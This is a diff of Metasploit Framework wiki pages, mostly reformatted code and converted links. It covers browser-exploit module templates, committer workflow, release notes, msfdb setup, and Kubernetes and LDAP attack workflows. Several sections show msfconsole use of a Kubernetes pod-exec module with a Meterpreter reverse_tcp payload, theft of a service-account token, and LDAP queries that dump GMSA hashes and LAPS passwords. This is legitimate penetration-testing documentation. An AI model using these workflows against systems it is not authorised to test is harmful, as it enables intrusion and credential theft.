-The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
+The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]], Msf::Exploit::Remote::HttpServer::HTML and [[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]. This writeup covers the HttpServer mixin.

 The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":

@@ -78,36 +78,36 @@ To get things started, you can always use the following template to start develo
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HttpServer mixin example",
-      'Description'    => %q{
-        Here's an example of using the HttpServer mixin
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     => 
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HttpServer mixin example',
+        'Description' => %q{
+          Here's an example of using the HttpServer mixin
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          [ 'URL', 'http://metasploit.com' ]
        ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
          [ 'Generic', {} ],
        ],
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2013-04-01',
+        'DefaultTarget' => 0
+      )
+    )
  end

-  def on_request_uri(cli, request)
-    html = "hello"
+  def on_request_uri(cli, _request)
+    html = 'hello'
    send_response(cli, html)
  end

@@ -7,48 +7,48 @@ Say you want to exploit a web server or web application. You have code execution
 Here is how you can set it up:

 ```ruby
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HttpClient and HttpServer Example",
-      'Description'    => %q{
-        This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
-        but this allows the HttpServer to terminate after a delay.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HttpClient and HttpServer Example',
+        'Description' => %q{
+          This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
+          but this allows the HttpServer to terminate after a delay.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          ['URL', 'http://metasploit.com']
        ],
-      'Payload'        => { 'BadChars' => "\x00" },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Payload' => { 'BadChars' => "\x00" },
+        'Platform' => 'win',
+        'Targets' => [
          [ 'Automatic', {} ],
        ],
-      'Privileged'     => false,
-      'DisclosureDate' => "Dec 09 2013",
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2013-12-09',
+        'DefaultTarget' => 0
+      )
+    )

-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
-          OptInt.new('HTTPDELAY',    [false, 'Number of seconds the web server will wait before termination', 10])
-        ], self.class)
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
+        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
+      ], self.class
+    )
  end

  def on_request_uri(cli, req)
@@ -58,15 +58,13 @@ class MetasploitModule < Msf::Exploit::Remote

  def primer
    print_status("Sending a malicious request to #{target_uri.path}")
-    send_request_cgi({'uri'=>normalize_uri(target_uri.path)})
+    send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
  end

  def exploit
-    begin
-      Timeout.timeout(datastore['HTTPDELAY']) { super }
-    rescue Timeout::Error
-      # When the server stops due to our timeout, this is raised
-    end
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+    # When the server stops due to our timeout, this is raised
  end
 end
 ```
@@ -82,7 +80,7 @@ In case you're wondering why the web server must terminate after a period of tim

 The output for the above example should look something like this:

-```
+```msf
 msf exploit(test) > run
 [*] Exploit running as background job.

@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla

 If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:

-```
+```msf
 msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
 VERBOSE => true
 msf exploit(ms13_022_silverlight_script_object) > run
@@ -1,13 +1,13 @@
 **This page is meant for Committers. If you are unsure whether you are a committer, you are not.**

-Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
+Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [[Dev environment setup|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.

 # The short story

- - Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
+ - Configure your git environment as described [[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
 - Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
 - Add your signing key `git config --global user.signingkey`
-     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below: 
+     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:

        ```
        pub   rsa4096 2020-04-07 [SC]
@@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
        sub   rsa4096 2020-04-07 [E]
        ```
     - Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
- 
+
       ```
       git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
       ```
@@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques

    Fixes #1024, also see #999.
    ````
-    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a 
+    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
      nice assurance that you're really you.
-    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if 
+    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
      the merge would normally be resolved as a fast forwards. This ensure that all changes have a
      commit associated with them.
-    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you 
-      to edit the commit message so that it conforms to Metasploit standards, rather than sticking 
+    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you
+      to edit the commit message so that it conforms to Metasploit standards, rather than sticking
      with git's pre-generated commit message which does not.
  - Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
 - If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
@@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
 Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
 # Fork and clone

-First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
+First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]], but the https method will work, too.

 Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.

@@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
 Here's an example with #6954 (your workflow may vary):

 ```
-$ git checkout upstream/master 
+$ git checkout upstream/master
 Note: checking out 'upstream/master'.

 You are in 'detached HEAD' state. You can look around, make experimental
@@ -258,7 +258,7 @@ c = commit -S --edit
 m = merge -S --no-ff --edit
 ````

-People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].

 # Post-Merge

@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.

 # Questions and Corrections

-Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com. 
+Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -1,6 +1,6 @@
 By default test modules in Metasploit are not loaded when Metasploit starts. To load them, run `loadpath test/modules` after which you should see output similar to the following:

-```
+```msf
 msf6 > loadpath test/modules
 Loaded 38 modules:
    14 auxiliary modules
@@ -9,4 +9,4 @@ Loaded 38 modules:
 msf6 > 
 ```

-These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
+These modules are intended to be used by developers to test updates to ensure they don't break core functionality and should not be used during normal operations. If you do happen to break the functionality of one of these modules, it is highly recommended that you look at what you are proposing within your PR and ensure that you are not accidentally breaking unintended functionality. If you do need to break certain functionality in order to add a given feature, and there is no other way to go around this, be sure to let one of the Metasploit team members know this so that appropriate updates can be made to these scripts and any associated code that may be updated by your change (assuming it is has been signed off and approved by the team).
@@ -1,6 +1,6 @@
-Metasploit Framework 5.0 has released! 
+Metasploit Framework 5.0 has released!

-Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use. 
+Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.

 See the release announcement [here](https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released).

@@ -12,7 +12,7 @@ The following is a high-level overview of Metasploit 5.0's features and capabili

 * A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.

-* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+* This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services [[here|./Metasploit-Web-Service.md]].

 * Adds `evasion` module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules [here](https://www.rapid7.com/info/encapsulating-antivirus-av-evasion-techniques-in-metasploit-framework). Rapid7's first evasion modules are [here](https://github.com/rapid7/metasploit-framework/pull/10759).

@@ -28,6 +28,6 @@ The following is a high-level overview of Metasploit 5.0's features and capabili

 You can get Metasploit 5.0 by checking out the [5.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/5.0.0) in the Metasploit GitHub project.

-Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend. 
+Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.

 See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -22,7 +22,7 @@ Metasploit 6 adds support for SMB client connections using the version 3 dialect

 While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the `SMB::AlwaysEncrypt` and `SMB::ProtocolVersion` options. `SMB::AlwaysEncrypt` enforces encryption for SMB 3 connections even when the server does not require it (defaults to: `true`) while `SMB::ProtocolVersion` is a comma separated list of versions to allow the framework to negotiate (default: `1,2,3`).

-Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [Guidelines for Writing Modules with SMB](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Writing-Modules-with-SMB).
+Module authors looking to write SMB modules should note the move towards the [RubySMB](https://github.com/rapid7/ruby_smb) protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the [mixins](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/exploit/smb) however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see [[Guidelines for Writing Modules with SMB|./Guidelines-for-Writing-Modules-with-SMB.md]].

 ## Pull Requests

@@ -48,6 +48,6 @@ A complete list of pull requests included as part of the initial version 6 work:

 You can get Metasploit 6.0 by checking out the [6.0.0 tag](https://github.com/rapid7/metasploit-framework/releases/tag/6.0.0) in the Metasploit GitHub project.

-Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://github.com/rapid7/metasploit-framework/wiki), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend. 
+Need a primer on Framework architecture and usage? Take a look at [our wiki here](https://docs.metasploit.com/), and feel free to reach out to the broader community [on Slack](https://metasploit.com/slack). There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can't find something you want in our wiki, ask Google or the community what they recommend.

 See all the ways to stay informed and get involved at <https://metasploit.com>.
@@ -25,14 +25,14 @@ The current data storage mechanism couples the metasploit core framework code to
 * The ability to support/use different data storage technologies is difficult
 * Promotes a monolithic architecture where poor performance in any segment of the software affects the entire system (large network scans)

-Our solution to this is a data service proxy.  A data service proxy allows us to separate core metasploit framework code from the underlying data service technology.  The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.
+Our solution to this is a data service proxy.  A data service proxy allows us to separate core Metasploit Framework code from the underlying data service technology.  The `framework.db` reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation.

 Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out.  The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to `framework.db` can be proxied to a remote web service that supports the same data service API.  We have built a web service that runs atop the current data storage service for the community.

 This approach enables us to:
-* More easily enhance the metasploit data model 
-* Run a web-based data service independent of the metasploit framework
-    * Reduces the memory used by a metasploit framework instance using a data service by no longer requiring a DB client
+* More easily enhance the Metasploit data model
+* Run a web-based data service independent of the Metasploit Framework
+    * Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client
    *  Increases throughput as storage calls don't necessarily need to be asynchronous
    *  Allow teams to collaborate easily by connecting to a centralized data service
 * Quickly build out data services that leverage different technology stacks
@@ -41,4 +41,4 @@ This approach enables us to:

 ## Usage

-For more information on setting up the web service and using the data services see [Metasploit Web Service](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+For more information on setting up the web service and using the data services see [[Metasploit Web Service|./Metasploit-Web-Service.md]].
@@ -1,22 +1,22 @@
 ## What is msfdb?
 msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit.

-While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database). 
+While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found [here](https://metasploit.help.rapid7.com/docs/managing-the-database).

 ## Why should I use msfdb?
-It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database. 
+It's not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database.

 The Metasploit features that require a connected database include:
 * Recording other machines on a network that are found with a nmap scan via the `db_nmap` command are stored as "Hosts".
  * Hosts can be viewed with the `hosts` command
-* Storing credentials successfully extracted by exploits are stored as "creds". 
+* Storing credentials successfully extracted by exploits are stored as "creds".
  * Credentials are viewed with the `creds` command.
-* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities". 
+* Keeping track of successful exploitation attempts are recorded as "Vulnerabilities".
  * Successful exploitations can be viewed with the `vulns` command.
-  * The `vulns` command also tracks unsuccessful exploitation attempts 
+  * The `vulns` command also tracks unsuccessful exploitation attempts
 * Storing services detected on remote hosts by `db_nmap` are recorded as "Services"
  * Remote services are viewed with the `services` command
-* Tracking multiple remote sessions opened by exploit payloads 
+* Tracking multiple remote sessions opened by exploit payloads
  * These sessions can be managed and tracked with the `sessions` command.
 * Storing any difficult to define information returned by successful exploits as "Loot"
  * Viewable with the `loot` command
@@ -62,7 +62,7 @@ Generating SSL key and certificate for MSF web service
 Attempting to start MSF web service...success
 MSF web service started and online
 Creating MSF web service user your_current_account_name
- 
+
    ############################################################
    ##              MSF Web Service Credentials               ##
    ##                                                        ##
@@ -77,15 +77,15 @@ MSF web service user API token: super_secret_api_token

 MSF web service configuration complete
 The web service has been configured as your default data service in msfconsole with the name "local-https-data-service"
- 
+
 If needed, manually reconnect to the data service in msfconsole using the command:
 db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443
- 
+
 The username and password are credentials for the API account:
 https://localhost:5443/api/v1/auth/account
 ```

-Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed: 
+Again, this is a lot of information to process, but it's not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed:

 ```
 MSF web service username: your_current_account_name
@@ -93,7 +93,7 @@ MSF web service password: super_secret_password
 MSF web service user API token: super_secret_api_token
 ```

-Followed by instructions on how to connect to your database with Metasploit via the Web Service: 
+Followed by instructions on how to connect to your database with Metasploit via the Web Service:

 ```
 If needed, manually reconnect to the data service in msfconsole using the command:
@@ -109,23 +109,23 @@ https://localhost:5443/api/v1/auth/account

 All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run `./msfdb reinit` and reset the Web Service authentication details. **Just make sure to say no to the prompt asking you if you want to delete the Database contents!**

-## msfdb commands  
+## msfdb commands

 The commands for msfdb are as follows:
-*   `./msfdb init`     Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice. 
-*   `./msfdb delete`   Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.  
+*   `./msfdb init`     Creates and begins execution of a database & web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice.
+*   `./msfdb delete`   Deletes the web service and database configuration files. You will also be prompted to delete the database's contents, but this is not mandatory.
 *   `./msfdb reinit`   The same as running `./msfdb delete` followed immediately by `./msfdb init`.
-*   `./msfdb status`   Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed. 
+*   `./msfdb status`   Displays if the database & web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed.
 *   `./msfdb start`    Start the database & web service.
-*   `./msfdb stop`     Stop the database & web service. 
+*   `./msfdb stop`     Stop the database & web service.
 *   `./msfdb restart`  The same as running `./msfdb stop` followed immediately by `./msfdb start`.

 ## msfdb errors

-In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose). 
+In the case of any of the above commands printing either a stack trace or error, your first step should be to run `./msfdb reinit` (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an [error ticket](https://github.com/rapid7/metasploit-framework/issues/new/choose).

 ## What's next?
-That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [here](https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Web-Service).
+That's it for the simple high level explanation of how to setup a database for metasploit. If that wasn't enough detail for you you can check out our more in depth explanation [[here|./Metasploit-Web-Service.md]].

 If you want to get started hacking but don't know how to, here are a few guides we really like:
 * [The easiest metasploit guide you'll ever read](https://www.exploit-db.com/docs/english/44040-the-easiest-metasploit-guide-you%E2%80%99ll-ever-read.pdf) - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation.
@@ -10,7 +10,7 @@ Note that any port can be used to run an application which communicates via HTTP

 This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance:

-```
+```msf
 msf6 > search tomcat http
 ```

@@ -48,7 +48,7 @@ run http://example.com HttpTrace=true verbose=true

 For instance:

-```
+```msf
 msf6 > use scanner/http/title
 msf6 auxiliary(scanner/http/title) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
@@ -8,7 +8,7 @@ a compromised docker container, or external to the cluster if the required APIs

 In the future there may be more modules than listed here, for the full list of modules run the `search` command within msfconsole:

-```
+```msf
 msf6 > search kubernetes
 ```

@@ -40,7 +40,7 @@ run session=-1

 If the Kubernetes API is publicly accessible and you have a JWT Token:

-```
+```msf
 msf6 > use cloud/kubernetes/enum_kubernetes
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
 RHOST => https://kubernetes.docker.internal:6443
@@ -67,7 +67,7 @@ Namespaces

 By default the `run` command will enumerate all resources available, but you can also specify which actions you would like to perform:

-```
+```msf
 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions

 Auxiliary actions:
@@ -114,7 +114,7 @@ The `exploit/multi/kubernetes/exec` module will attempt to create a new pod in t
 If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` module options
 will be gathered from the session host automatically. The `TOKEN` will be read from the mounted `/run/secrets/kubernetes.io/serviceaccount/token` file if available:

-```
+```msf
 msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
 TARGET => Interactive WebSocket
 msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
@@ -136,7 +136,7 @@ pwd

 If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the `thinkphp-67f7c88cc9-tgpfh` pod:

-```
+```msf
 msf6 > use exploit/multi/kubernetes/exec
 [*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1...
@@ -0,0 +1,128 @@
+## LDAP Workflows
+
+Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service.
+For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc.
+
+LDAP on Windows environments are found on:
+
+- 389/TCP - LDAP
+- 636/TCP - LDAPS
+- 3268 - Global Catalog LDAP
+- 3269 - Global Catalog LDAPS
+
+### Lab Environment
+
+LDAP support is enabled by default on a Windows environment when you install Active Directory.
+For LDAPS support to be enabled on port 636, you will have to configure [[AD CS (Active Directory Certificate Services)|ad-certificates/overview.md]]
+
+### Authentication
+
+The LDAP module supports the following forms of authentication with the `LDAP::Auth` option:
+
+- auto
+- ntlm
+- kerberos - Example below
+- plaintext
+- none
+
+### LDAP Enumeration
+
+The `auxiliary/gather/ldap_query.rb` module can be used for querying LDAP:
+
+```
+use auxiliary/gather/ldap_query
+run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+```
+
+Example output:
+
+```msf
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.123.13 username=Administrator@domain.local password=p4$$w0rd action=ENUM_ACCOUNTS
+[*] Running module against 192.168.123.13
+
+[*] Discovering base DN automatically
+[+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local
+CN=Administrator CN=Users DC=domain DC=local
+==========================================
+
+ Name                Attributes
+ ----                ----------
+ badpwdcount         0
+ description         Built-in account for administering the computer/domain
+ lastlogoff          1601-01-01 00:00:00 UTC
+ lastlogon           2023-01-23 11:02:49 UTC
+ logoncount          159
+ memberof            CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local |
+                     | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm
+                     inistrators,CN=Builtin,DC=domain,DC=local
+ name                Administrator
+ objectsid           S-1-5-21-3402587289-1488798532-3618296993-500
+ pwdlastset          133189448681297271
+ samaccountname      Administrator
+ useraccountcontrol  512
+
+ ... etc ...
+```
+
+This module has a selection of inbuilt queries which can be configured via the `action` setting to make enumeration easier:
+
+- `ENUM_ACCOUNTS` - Dump info about all known user accounts in the domain.
+- `ENUM_AD_CS_CAS` - Enumerate AD CS certificate authorities.
+- `ENUM_AD_CS_CERT_TEMPLATES` - Enumerate AD CS certificate templates.
+- `ENUM_ADMIN_OBJECTS` - Dump info about all objects with protected ACLs (i.e highly privileged objects).
+- `ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
+- `ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
+- `ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
+- `ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow contrained delegation.
+- `ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
+- `ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries.
+- `ENUM_DOMAIN` - Dump info about the Active Directory domain.
+- `ENUM_DOMAIN_CONTROLLERS` - Dump all known domain controllers.
+- `ENUM_EXCHANGE_RECIPIENTS` - Dump info about all known Exchange recipients.
+- `ENUM_EXCHANGE_SERVERS` - Dump info about all known Exchange servers.
+- `ENUM_GMSA_HASHES` - Dump info about GMSAs and their password hashes if available.
+- `ENUM_GROUPS` - Dump info about all known groups in the LDAP environment.
+- `ENUM_GROUP_POLICY_OBJECTS` - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment.
+- `ENUM_HOSTNAMES` - Dump info about all known hostnames in the LDAP environment.
+- `ENUM_LAPS_PASSWORDS` - Dump info about computers that have LAPS enabled, and passwords for them if available.
+- `ENUM_LDAP_SERVER_METADATA` - Dump metadata about the setup of the domain.
+- `ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
+- `ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
+- `ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
+- `ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow uncontrained delegation.
+- `ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
+- `ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
+- `ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
+- `ENUM_USER_PASSWORD_NEVER_EXPIRES` - Dump info about all users whose password never expires.
